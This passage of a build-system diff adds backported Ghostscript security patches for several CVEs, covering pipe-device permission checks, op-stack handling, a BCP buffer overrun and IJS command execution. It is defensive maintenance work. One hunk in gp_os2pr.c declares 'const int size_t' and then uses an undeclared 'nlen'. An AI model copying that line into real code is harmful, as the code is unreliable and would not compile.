+ base/gp_msprn.c | 10 ++++++-
+ base/gp_os2pr.c | 13 +++++++++-
+ base/gslibctx.c | 69 ++++++++++---------------------------------------
+ 5 files changed, 65 insertions(+), 60 deletions(-)
+
+diff --git a/base/gdevpipe.c b/base/gdevpipe.c
+index 96d71f5d8..5bdc485be 100644
+--- a/base/gdevpipe.c
++++ b/base/gdevpipe.c
+@@ -72,8 +72,28 @@ pipe_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ #else
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ /* The pipe device can be reached in two ways, explicltly with %pipe%
++ or implicitly with "|", so we have to check for both
++ */
++ char f[gp_file_name_sizeof];
++ const char *pipestr = "|";
++ const size_t pipestrlen = strlen(pipestr);
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
++ int code1;
++
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(f, iodev->dname, preflen);
++ memcpy(f + preflen, fname, nlen + 1);
++
++ code1 = gp_validate_path(mem, f, access);
++
++ memcpy(f, pipestr, pipestrlen);
++ memcpy(f + pipestrlen, fname, nlen + 1);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (code1 != 0 && gp_validate_path(mem, f, access) != 0 )
+ return gs_error_invalidfileaccess;
+
+ /*
+diff --git a/base/gp_mshdl.c b/base/gp_mshdl.c
+index 2b964ed74..8d87ceadc 100644
+--- a/base/gp_mshdl.c
++++ b/base/gp_mshdl.c
+@@ -95,8 +95,17 @@ mswin_handle_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ long hfile; /* Correct for Win32, may be wrong for Win64 */
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ char f[gp_file_name_sizeof];
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(f, iodev->dname, preflen);
++ memcpy(f + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, f, access) != 0)
+ return gs_error_invalidfileaccess;
+
+ /* First we try the open_handle method. */
+diff --git a/base/gp_msprn.c b/base/gp_msprn.c
+index ed4827968..746a974f7 100644
+--- a/base/gp_msprn.c
++++ b/base/gp_msprn.c
+@@ -168,8 +168,16 @@ mswin_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ unsigned long *ptid = &((tid_t *)(iodev->state))->tid;
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(pname, iodev->dname, preflen);
++ memcpy(pname + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, pname, access) != 0)
+ return gs_error_invalidfileaccess;
+
+ /* First we try the open_printer method. */
+diff --git a/base/gp_os2pr.c b/base/gp_os2pr.c
+index f852c71fc..ba54cde66 100644
+--- a/base/gp_os2pr.c
++++ b/base/gp_os2pr.c
+@@ -107,9 +107,20 @@ os2_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ FILE ** pfile, char *rfname, uint rnamelen)
+ {
+ os2_printer_t *pr = (os2_printer_t *)iodev->state;
+- char driver_name[256];
++ char driver_name[gp_file_name_sizeof];
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ const size_t preflen = strlen(iodev->dname);
++ const int size_t = strlen(fname);
++
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(driver_name, iodev->dname, preflen);
++ memcpy(driver_name + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, driver_name, access) != 0)
++ return gs_error_invalidfileaccess;
+
+ /* First we try the open_printer method. */
+ /* Note that the loop condition here ensures we don't
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 6dfed6cd5..318039fad 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -655,82 +655,39 @@ rewrite_percent_specifiers(char *s)
+ int
+ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ {
+- char *fp, f[gp_file_name_sizeof];
+- const int pipe = 124; /* ASCII code for '|' */
+- const int len = strlen(fname);
+- int i, code;
++ char f[gp_file_name_sizeof];
++ int code;
+
+ /* Be sure the string copy will fit */
+- if (len >= gp_file_name_sizeof)
++ if (strlen(fname) >= gp_file_name_sizeof)
+ return gs_error_rangecheck;
+ strcpy(f, fname);
+- fp = f;
+ /* Try to rewrite any %d (or similar) in the string */
+ rewrite_percent_specifiers(f);
+- for (i = 0; i < len; i++) {
+- if (f[i] == pipe) {
+- fp = &f[i + 1];
+- /* Because we potentially have to check file permissions at two levels
+- for the output file (gx_device_open_output_file and the low level
+- fopen API, if we're using a pipe, we have to add both the full string,
+- (including the '|', and just the command to which we pipe - since at
+- the pipe_fopen(), the leading '|' has been stripped.
+- */
+- code = gs_add_control_path(mem, gs_permit_file_writing, f);
+- if (code < 0)
+- return code;
+- code = gs_add_control_path(mem, gs_permit_file_control, f);
+- if (code < 0)
+- return code;
+- break;
+- }
+- if (!IS_WHITESPACE(f[i]))
+- break;
+- }
+- code = gs_add_control_path(mem, gs_permit_file_control, fp);
++
++ code = gs_add_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+- return gs_add_control_path(mem, gs_permit_file_writing, fp);
++ return gs_add_control_path(mem, gs_permit_file_writing, f);
+ }
+
+ int
+ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ {
+- char *fp, f[gp_file_name_sizeof];
+- const int pipe = 124; /* ASCII code for '|' */
+- const int len = strlen(fname);
+- int i, code;
++ char f[gp_file_name_sizeof];
++ int code;
+
+ /* Be sure the string copy will fit */
+- if (len >= gp_file_name_sizeof)
++ if (strlen(fname) >= gp_file_name_sizeof)
+ return gs_error_rangecheck;
+ strcpy(f, fname);
+- fp = f;
+ /* Try to rewrite any %d (or similar) in the string */
+- for (i = 0; i < len; i++) {
+- if (f[i] == pipe) {
+- fp = &f[i + 1];
+- /* Because we potentially have to check file permissions at two levels
+- for the output file (gx_device_open_output_file and the low level
+- fopen API, if we're using a pipe, we have to add both the full string,
+- (including the '|', and just the command to which we pipe - since at
+- the pipe_fopen(), the leading '|' has been stripped.
+- */
+- code = gs_remove_control_path(mem, gs_permit_file_writing, f);
+- if (code < 0)
+- return code;
+- code = gs_remove_control_path(mem, gs_permit_file_control, f);
+- if (code < 0)
+- return code;
+- break;
+- }
+- if (!IS_WHITESPACE(f[i]))
+- break;
+- }
+- code = gs_remove_control_path(mem, gs_permit_file_control, fp);
++ rewrite_percent_specifiers(f);
++
++ code = gs_remove_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+- return gs_remove_control_path(mem, gs_permit_file_writing, fp);
++ return gs_remove_control_path(mem, gs_permit_file_writing, f);
+ }
+
+ int
+--
+2.25.1
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch
new file mode 100644
index 0000000000..f312f89e04
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch
@@ -0,0 +1,65 @@
+From 6643ff0cb837db3eade489ffff21e3e92eee2ae0 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 28 Jan 2022 08:21:19 +0000
+Subject: [PATCH] [PATCH] Bug 703902: Fix op stack management in
+ sampled_data_continue()
+
+Replace pop() (which does no checking, and doesn't handle stack extension
+blocks) with ref_stack_pop() which does do all that.
+
+We still use pop() in one case (it's faster), but we have to later use
+ref_stack_pop() before calling sampled_data_sample() which also accesses the
+op stack.
+
+Fixes:
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=34675
+
+Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=2a3129365d3bc0d4a41f107ef175920d1505d1f7]
+CVE: CVE-2021-45949
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ psi/zfsample.c | 13 ++++++++-----
+ 1 file changed, 8 insertions(+), 5 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 0023fa4..f84671f 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -534,14 +534,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ data_ptr[bps * i + j] = (byte)(cv >> ((bps - 1 - j) * 8)); /* MSB first */
+ }
+ pop(num_out); /* Move op to base of result values */
+-
++ /* From here on, we have to use ref_stack_pop() rather than pop()
++ so that it handles stack extension blocks properly, before calling
++ sampled_data_sample() which also uses the op stack.
++ */
+ /* Check if we are done collecting data. */
+
+ if (increment_cube_indexes(params, penum->indexes)) {
+ if (stack_depth_adjust == 0)
+- pop(O_STACK_PAD); /* Remove spare stack space */
++ ref_stack_pop(&o_stack, O_STACK_PAD); /* Remove spare stack space */
+ else
+- pop(stack_depth_adjust - num_out);
++ ref_stack_pop(&o_stack, stack_depth_adjust - num_out);
+ /* Execute the closing procedure, if given */
+ code = 0;
+ if (esp_finish_proc != 0)
+@@ -554,11 +557,11 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ if ((O_STACK_PAD - stack_depth_adjust) < 0) {
+ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
+ check_op(stack_depth_adjust);
+- pop(stack_depth_adjust);
++ ref_stack_pop(&o_stack, stack_depth_adjust);
+ }
+ else {
+ check_ostack(O_STACK_PAD - stack_depth_adjust);
+- push(O_STACK_PAD - stack_depth_adjust);
++ ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust);
+ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+ make_null(op - i);
+ }
+--
+2.17.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch
new file mode 100644
index 0000000000..852f2459f7
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch
@@ -0,0 +1,54 @@
+From 37ed5022cecd584de868933b5b60da2e995b3179 Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Fri, 24 Mar 2023 13:19:57 +0000
+Subject: [PATCH] Graphics library - prevent buffer overrun in (T)BCP encoding
+
+Bug #706494 "Buffer Overflow in s_xBCPE_process"
+
+As described in detail in the bug report, if the write buffer is filled
+to one byte less than full, and we then try to write an escaped
+character, we overrun the buffer because we don't check before
+writing two bytes to it.
+
+This just checks if we have two bytes before starting to write an
+escaped character and exits if we don't (replacing the consumed byte
+of the input).
+
+Up for further discussion; why do we even permit a BCP encoding filter
+anyway ? I think we should remove this, at least when SAFER is true.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=37ed5022cecd584de868933b5b60da2e995b3179]
+CVE: CVE-2023-28879
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/sbcp.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/base/sbcp.c b/base/sbcp.c
+index 6b0383c..90784b5 100644
+--- a/base/sbcp.c
++++ b/base/sbcp.c
+@@ -1,4 +1,4 @@
+-/* Copyright (C) 2001-2019 Artifex Software, Inc.
++/* Copyright (C) 2001-2023 Artifex Software, Inc.
+ All Rights Reserved.
+
+ This software is provided AS-IS with no warranty, either express or
+@@ -50,6 +50,14 @@ s_xBCPE_process(stream_state * st, stream_cursor_read * pr,
+ byte ch = *++p;
+
+ if (ch <= 31 && escaped[ch]) {
++ /* Make sure we have space to store two characters in the write buffer,
++ * if we don't then exit without consuming the input character, we'll process
++ * that on the next time round.
++ */
++ if (pw->limit - q < 2) {
++ p--;
++ break;
++ }
+ if (p == rlimit) {
+ p--;
+ break;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch
new file mode 100644
index 0000000000..a3bbe958eb
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch
@@ -0,0 +1,145 @@
+From 5e65eeae225c7d02d447de5abaf4a8e6d234fcea Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Wed, 7 Jun 2023 10:23:06 +0100
+Subject: [PATCH] Bug 706761: Don't "reduce" %pipe% file names for permission validation
+
+For regular file names, we try to simplfy relative paths before we use them.
+
+Because the %pipe% device can, effectively, accept command line calls, we
+shouldn't be simplifying that string, because the command line syntax can end
+up confusing the path simplifying code. That can result in permitting a pipe
+command which does not match what was originally permitted.
+
+Special case "%pipe" in the validation code so we always deal with the entire
+string.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=505eab7782b429017eb434b2b95120855f2b0e3c]
+CVE: CVE-2023-36664
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 31 +++++++++++++++++++--------
+ base/gslibctx.c | 56 ++++++++++++++++++++++++++++++++++++-------------
+ 2 files changed, 64 insertions(+), 23 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index c4fffae..09ac6b3 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -1046,16 +1046,29 @@ gp_validate_path_len(const gs_memory_t *mem,
+ && !memcmp(path + cdirstrl, dirsepstr, dirsepstrl)) {
+ prefix_len = 0;
+ }
+- rlen = len+1;
+- bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
+- if (bufferfull == NULL)
+- return gs_error_VMerror;
+-
+- buffer = bufferfull + prefix_len;
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
+
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len+1;
++ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
++ if (bufferfull == NULL)
++ return gs_error_VMerror;
++
++ buffer = bufferfull + prefix_len;
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+ while (1) {
+ switch (mode[0])
+ {
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 20c5eee..355c0e3 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -719,14 +719,28 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
+ return gs_error_rangecheck;
+ }
+
+- rlen = len+1;
+- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
+- if (buffer == NULL)
+- return gs_error_VMerror;
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len + 1;
+
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
++ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_add_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+
+ n = control->num;
+ for (i = 0; i < n; i++)
+@@ -802,14 +816,28 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
+ return gs_error_rangecheck;
+ }
+
+- rlen = len+1;
+- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
+- if (buffer == NULL)
+- return gs_error_VMerror;
++ /* "%pipe%" do not follow the normal rules for path definitions, so we
++ don't "reduce" them to avoid unexpected results
++ */
++ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++ memcpy(buffer, path, len);
++ buffer[len] = 0;
++ rlen = len;
++ }
++ else {
++ rlen = len+1;
+
+- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+- return gs_error_invalidfileaccess;
+- buffer[rlen] = 0;
++ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_remove_control_path_len");
++ if (buffer == NULL)
++ return gs_error_VMerror;
++
++ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++ return gs_error_invalidfileaccess;
++ buffer[rlen] = 0;
++ }
+
+ n = control->num;
+ for (i = 0; i < n; i++) {
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch
new file mode 100644
index 0000000000..e8c42f1deb
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch
@@ -0,0 +1,60 @@
+From fb342fdb60391073a69147cb71af1ac416a81099 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Wed, 14 Jun 2023 09:08:12 +0100
+Subject: [PATCH] Bug 706778: 706761 revisit
+
+Two problems with the original commit. The first a silly typo inverting the
+logic of a test.
+
+The second was forgetting that we actually actually validate two candidate
+strings for pipe devices. One with the expected "%pipe%" prefix, the other
+using the pipe character prefix: "|".
+
+This addresses both those.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=fb342fdb60391073a69147cb71af1ac416a81099]
+CVE: CVE-2023-36664
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 2 +-
+ base/gslibctx.c | 4 ++--
+ 2 files changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index 09ac6b3..01d449f 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -1050,7 +1050,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+ /* "%pipe%" do not follow the normal rules for path definitions, so we
+ don't "reduce" them to avoid unexpected results
+ */
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
+ if (buffer == NULL)
+ return gs_error_VMerror;
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 355c0e3..d8f74a3 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -722,7 +722,7 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
+ /* "%pipe%" do not follow the normal rules for path definitions, so we
+ don't "reduce" them to avoid unexpected results
+ */
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
+ if (buffer == NULL)
+ return gs_error_VMerror;
+@@ -819,7 +819,7 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
+ /* "%pipe%" do not follow the normal rules for path definitions, so we
+ don't "reduce" them to avoid unexpected results
+ */
+- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
+ if (buffer == NULL)
+ return gs_error_VMerror;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch
new file mode 100644
index 0000000000..662736bb3d
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch
@@ -0,0 +1,62 @@
+From 4ceaf92815302863a8c86fcfcf2347e0118dd3a5 Mon Sep 17 00:00:00 2001
+From: Ray Johnston <ray.johnston@artifex.com>
+Date: Tue, 22 Sep 2020 13:10:04 -0700
+Subject: [PATCH] Fix gp_file allocations to use thread_safe_memory.
+
+The gpmisc.c does allocations for gp_file objects and buffers used by
+gp_fprintf, as well as gp_validate_path_len. The helgrind run with
+-dBGPrint -dNumRenderingThreads=4 and PCL input showed up the gp_fprintf
+problem since the clist rendering would call gp_fprintf using the same
+allocator (PCL's chunk allocator which is non_gc_memory). The chunk
+allocator is intentionally not thread safe (for performance).
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4ceaf92815302863a8c86fcfcf2347e0118dd3a5]
+CVE: CVE-2023-36664 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index 34cd71f..c4fffae 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -435,7 +435,7 @@ generic_pwrite(gp_file *f, size_t count, gs_offset_t offset, const void *buf)
+
+ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t size, const char *cname)
+ {
+- gp_file *file = (gp_file *)gs_alloc_bytes(mem->non_gc_memory, size, cname ? cname : "gp_file");
++ gp_file *file = (gp_file *)gs_alloc_bytes(mem->thread_safe_memory, size, cname ? cname : "gp_file");
+ if (file == NULL)
+ return NULL;
+
+@@ -449,7 +449,7 @@ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t
+ memset(((char *)file)+sizeof(*prototype),
+ 0,
+ size - sizeof(*prototype));
+- file->memory = mem->non_gc_memory;
++ file->memory = mem->thread_safe_memory;
+
+ return file;
+ }
+@@ -1047,7 +1047,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+ prefix_len = 0;
+ }
+ rlen = len+1;
+- bufferfull = (char *)gs_alloc_bytes(mem->non_gc_memory, rlen + prefix_len, "gp_validate_path");
++ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
+ if (bufferfull == NULL)
+ return gs_error_VMerror;
+
+@@ -1093,7 +1093,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+ break;
+ }
+
+- gs_free_object(mem->non_gc_memory, bufferfull, "gp_validate_path");
++ gs_free_object(mem->thread_safe_memory, bufferfull, "gp_validate_path");
+ #ifdef EACCES
+ if (code == gs_error_invalidfileaccess)
+ errno = EACCES;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch
new file mode 100644
index 0000000000..3acb8a503c
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch
@@ -0,0 +1,62 @@
+From 8b0f20002536867bd73ff4552408a72597190cbe Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Thu, 24 Aug 2023 15:24:35 +0100
+Subject: [PATCH] IJS device - try and secure the IJS server startup
+
+Bug #707051 ""ijs" device can execute arbitrary commands"
+
+The problem is that the 'IJS' device needs to start the IJS server, and
+that is indeed an arbitrary command line. There is (apparently) no way
+to validate it. Indeed, this is covered quite clearly in the comments
+at the start of the source:
+
+ * WARNING: The ijs server can be selected on the gs command line
+ * which is a security risk, since any program can be run.
+
+Previously this used the awful LockSafetyParams hackery, which we
+abandoned some time ago because it simply couldn't be made secure (it
+was implemented in PostScript and was therefore vulnerable to PostScript
+programs).
+
+This commit prevents PostScript programs switching to the IJS device
+after SAFER has been activated, and prevents changes to the IjsServer
+parameter after SAFER has been activated.
+
+SAFER is activated, unless explicitly disabled, before any user
+PostScript is executed which means that the device and the server
+invocation can only be configured on the command line. This does at
+least provide minimal security against malicious PostScript programs.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5]
+CVE: CVE-2023-43115
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ devices/gdevijs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/devices/gdevijs.c b/devices/gdevijs.c
+index 3d337c5..e50d69f 100644
+--- a/devices/gdevijs.c
++++ b/devices/gdevijs.c
+@@ -934,6 +934,9 @@ gsijs_finish_copydevice(gx_device *dev, const gx_device *from_dev)
+ static const char rgb[] = "DeviceRGB";
+ gx_device_ijs *ijsdev = (gx_device_ijs *)dev;
+
++ if (ijsdev->memory->gs_lib_ctx->core->path_control_active)
++ return_error(gs_error_invalidaccess);
++
+ code = gx_default_finish_copydevice(dev, from_dev);
+ if(code < 0)
+ return code;
+@@ -1363,7 +1366,7 @@ gsijs_put_params(gx_device *dev, gs_param_list *plist)
+ if (code >= 0)
+ code = gsijs_read_string(plist, "IjsServer",
+ ijsdev->IjsServer, sizeof(ijsdev->IjsServer),
+- dev->LockSafetyParams, is_open);
++ ijsdev->memory->gs_lib_ctx->core->path_control_active, is_open);
+
+ if (code >= 0)
+ code = gsijs_read_string_malloc(plist, "DeviceManufacturer",
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch
new file mode 100644
index 0000000000..77eec7d158
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch
@@ -0,0 +1,51 @@
+From 7861fcad13c497728189feafb41cd57b5b50ea25 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 12 Feb 2021 10:34:23 +0000
+Subject: [PATCH] oss-fuzz 30715: Check stack limits after function evaluation.
+
+During function result sampling, after the callout to the Postscript
+interpreter, make sure there is enough stack space available before pushing
+or popping entries.
+
+In thise case, the Postscript procedure for the "function" is totally invalid
+(as a function), and leaves the op stack in an unrecoverable state (as far as
+function evaluation is concerned). We end up popping more entries off the
+stack than are available.
+
+To cope, add in stack limit checking to throw an appropriate error when this
+happens.
+CVE: CVE-2021-45944
+Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25]
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ psi/zfsample.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 290809405..652ae02c6 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -551,9 +551,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ } else {
+ if (stack_depth_adjust) {
+ stack_depth_adjust -= num_out;
+- push(O_STACK_PAD - stack_depth_adjust);
+- for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+- make_null(op - i);
++ if ((O_STACK_PAD - stack_depth_adjust) < 0) {
++ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
++ check_op(stack_depth_adjust);
++ pop(stack_depth_adjust);
++ }
++ else {
++ check_ostack(O_STACK_PAD - stack_depth_adjust);
++ push(O_STACK_PAD - stack_depth_adjust);
++ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
++ make_null(op - i);
++ }
+ }
+ }
+
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
index 65135f5821..e57f592892 100644
--- a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
+++ b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
@@ -19,6 +19,10 @@ DEPENDS_class-native = "libpng-native"
UPSTREAM_CHECK_URI = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases"
UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)\.tar"
+# The jpeg issue in the CVE is present in the gs jpeg sources
+# however we use an external jpeg which doesn't have the issue.
+CVE_CHECK_WHITELIST += "CVE-2013-6629"
+
def gs_verdir(v):
return "".join(v.split("."))
@@ -29,12 +33,24 @@ SRC_URI_BASE = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/d
